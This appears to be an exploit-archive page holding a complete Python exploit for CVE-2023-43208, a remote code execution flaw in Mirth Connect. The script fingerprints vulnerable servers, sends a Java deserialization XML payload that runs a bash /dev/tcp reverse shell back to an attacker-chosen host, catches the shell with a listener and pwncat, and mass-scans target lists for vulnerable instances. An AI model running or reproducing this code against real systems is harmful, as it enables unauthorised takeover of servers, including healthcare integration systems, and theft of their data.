4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-43208.py PY
import os
import time
import socket
import argparse
import requests
import threading
import pwncat.manager

from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed

requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)


class MirthConnectExploit:
    def __init__(self):
        self.console = Console()
        self.execution_process = "/api/users"
        self.grab_version = "/api/server/version"
        self.headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0",
            "X-Requested-With": "OpenAPI",
            "Content-Type": "application/xml",
        }
        self.output_file = None

    def custom_print(self, message: str, header: str) -> None:
        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
        self.console.print(
            f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
        )

    def ascii_art(self):
        art_texts = [
            " ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██   ██ ██████  ██████   ██████   █████",
            "██      ██    ██ ██                 ██ ██  ████      ██      ██       ██   ██      ██      ██ ██  ████ ██   ██",
            "██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████ ███████  █████   █████  ██ ██ ██  █████",
            "██       ██  ██  ██            ██      ████  ██ ██           ██            ██      ██ ██      ████  ██ ██   ██",
            " ██████   ████   ███████       ███████  ██████  ███████ ██████             ██ ██████  ███████  ██████   █████",
        ]
        print()
        for text in art_texts:
            self.custom_print(f"[bold bright_green]{text}[/bold bright_green]", "*")
        print()
        self.custom_print(
            "Coded By: K3ysTr0K3R and Chocapikk ( NSA, we're still waiting :D )", "+"
        )
        print()

    def start_listener(self, timeout=10) -> None:
        with socket.create_server(("0.0.0.0", int(self.rshell_port))) as listener:
            listener.settimeout(timeout)
            self.custom_print(
                f"Waiting for incoming connection on port {self.rshell_port}...", "*"
            )

            try:
                victim, victim_addr = listener.accept()
                self.revshell_connected = True
                self.custom_print(
                    f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
                )

                with pwncat.manager.Manager() as manager:
                    session = manager.create_session(
                        platform="linux", protocol="socket", client=victim
                    )
                    self.custom_print("Dropping to pwncat prompt...", "+")
                    manager.interactive()
            except socket.timeout:
                self.custom_print(
                    f"No reverse shell connection received within {timeout} seconds.",
                    "-",
                )

    def detect_mirth_connect(self, target):
        self.custom_print("Looking for Mirth Connect instance...", "*")
        try:
            response = requests.get(target, timeout=10, verify=False)
            if "Mirth Connect Administrator" in response.text:
                self.custom_print("Found Mirth Connect instance", "+")
                return True
            else:
                self.custom_print("Mirth Connect not found", "-")
        except requests.exceptions.RequestException as e:
            self.custom_print(f"Error while trying to connect to {target}: {e}", "-")
        return False

    def is_vulnerable_version(self, version_str):
        parsed_version = version.parse(version_str)
        if isinstance(parsed_version, version.Version):
            fixed_version = version.parse("4.4.1")
            if parsed_version < fixed_version:
                return version_str

    def detect_vuln(self, target):
        if self.detect_mirth_connect(target):
            try:
                response = requests.get(
                    target + self.grab_version,
                    headers=self.headers,
                    timeout=10,
                    verify=False,
                )
                if response and self.is_vulnerable_version(response.text):
                    self.custom_print(
                        f"Vulnerable Mirth Connect version {response.text} instance found at {target}",
                        "+",
                    )
                    return True
            except requests.exceptions.RequestException as e:
                self.custom_print(
                    f"Error fetching version information from {target}: {e}", "-"
                )
        return False

    @staticmethod
    def build_xml_payload(command):
        command = command.replace("&", "&amp;")
        command = command.replace("<", "&lt;")
        command = command.replace(">", "&gt;")
        command = command.replace('"', "&quot;")
        command = command.replace("'", "&apos;")

        xml_data = f"""
        <sorted-set>
            <string>abcd</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
                    <target class="org.apache.commons.collections4.functors.ChainedTransformer">
                        <iTransformers>
                            <org.apache.commons.collections4.functors.ConstantTransformer>
                                <iConstant class="java-class">java.lang.Runtime</iConstant>
                            </org.apache.commons.collections4.functors.ConstantTransformer>
                            <org.apache.commons.collections4.functors.InvokerTransformer>
                                <iMethodName>getMethod</iMethodName>
                                <iParamTypes>
                                    <java-class>java.lang.String</java-class>
                                    <java-class>[Ljava.lang.Class;</java-class>
                                </iParamTypes>
                                <iArgs>
                                    <string>getRuntime</string>
                                    <java-class-array/>
                                </iArgs>
                            </org.apache.commons.collections4.functors.InvokerTransformer>
                            <org.apache.commons.collections4.functors.InvokerTransformer>
                                <iMethodName>invoke</iMethodName>
                                <iParamTypes>
                                    <java-class>java.lang.Object</java-class>
                                    <java-class>[Ljava.lang.Object;</java-class>
                                </iParamTypes>
                                <iArgs>
                                    <null/>
                                    <object-array/>
                                </iArgs>
                            </org.apache.commons.collections4.functors.InvokerTransformer>
                            <org.apache.commons.collections4.functors.InvokerTransformer>
                                <iMethodName>exec</iMethodName>
                                <iParamTypes>
                                    <java-class>java.lang.String</java-class>
                                </iParamTypes>
                                <iArgs>
                                    <string>{command}</string>
                                </iArgs>
                            </org.apache.commons.collections4.functors.InvokerTransformer>
                        </iTransformers>
                    </target>
                    <methodName>transform</methodName>
                    <eventTypes>
                        <string>compareTo</string>
                    </eventTypes>
                </handler>
            </dynamic-proxy>
        </sorted-set>
        """
        return xml_data

    def exploit(self, target, lhost, lport):
        if self.detect_vuln(target):
            command = f"sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/{lhost}/{lport};sh <&53 >&53 2>&53'"
            self.custom_print(command, "!")
            xml_data = self.build_xml_payload(command)
            try:
                self.custom_print(f"Launching exploit against {target}...", "*")
                try:
                    response = requests.post(
                        target + self.execution_process,
                        headers=self.headers,
                        data=xml_data,
                        timeout=20,
                        verify=False,
                    )
                except requests.exceptions.RequestException as e:
                    self.custom_print(f"Exploit failed for {target}: {e}", "-")

            except requests.exceptions.RequestException:
                self.custom_print(f"Exploit failed for {target}", "-")

    def shell_opened(self, target, lhost, lport, bindport=None, timeout=10):
        self.rshell_port = bindport if bindport is not None else lport

        self.custom_print(
            f"Setting up listener on {lhost}:{self.rshell_port} and launching exploit...",
            "*",
        )

        listener_thread = threading.Thread(target=self.start_listener, args=(timeout,))
        listener_thread.start()
        time.sleep(1)

        self.exploit(target, lhost, lport)

        listener_thread.join()

    def scanner(self, target):
        try:
            response = requests.get(
                target + self.grab_version,
                headers=self.headers,
                timeout=10,
                verify=False,
            )
            vuln_version = self.is_vulnerable_version(response.text)
            if vuln_version:
                self.custom_print(
                    f"Vulnerability Detected | [bold bright_yellow]{target:<60}[/bold bright_yellow] | Server Version: [bold cyan]{vuln_version:<15}[/bold cyan]",
                    "+",
                )
                if self.output_file:
                    with open(self.output_file, "a") as file:
                        file.write(target + "\n")
        except requests.exceptions.RequestException:
            pass

    def scan_from_file(self, target_file, threads):
        if not os.path.exists(target_file):
            self.custom_print(f"File not found: {target_file}", "-")
            return

        with open(target_file, "r") as url_file:
            urls = [url.strip() for url in url_file.readlines()]
            if not urls:
                return

            with alive_bar(
                len(urls), title="Scanning Targets", bar="smooth", enrich_print=False
            ) as bar:
                with ThreadPoolExecutor(max_workers=threads) as executor:
                    futures = [executor.submit(self.scanner, url) for url in urls]
                    for future in as_completed(futures):
                        bar()

    def run(self):
        parser = argparse.ArgumentParser(
            description="A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)"
        )
        parser.add_argument("-u", "--url", help="Target URL to exploit")
        parser.add_argument("-lh", "--lhost", help="Listening host")
        parser.add_argument("-lp", "--lport", help="Listening port")
        parser.add_argument(
            "-bp",
            "--bindport",
            type=int,
            help="Port for the bind listener (useful with ngrok)",
        )
        parser.add_argument("-f", "--file", help="File containing target URLs to scan")
        parser.add_argument(
            "-o", "--output", help="Output file for saving scan results"
        )
        parser.add_argument(
            "-t",
            "--threads",
            default=50,
            type=int,
            help="Number of threads to use for scanning",
        )
        args = parser.parse_args()

        self.output_file = args.output

        match (args.url, args.lhost, args.lport, args.file):
            case (url, lhost, lport, None) if url and lhost and lport:
                self.shell_opened(url, lhost, lport, args.bindport)
            case (None, None, None, file) if file:
                self.scan_from_file(file, args.threads)
            case _:
                parser.print_help()


if __name__ == "__main__":
    exploit_tool = MirthConnectExploit()
    exploit_tool.ascii_art()
    exploit_tool.run()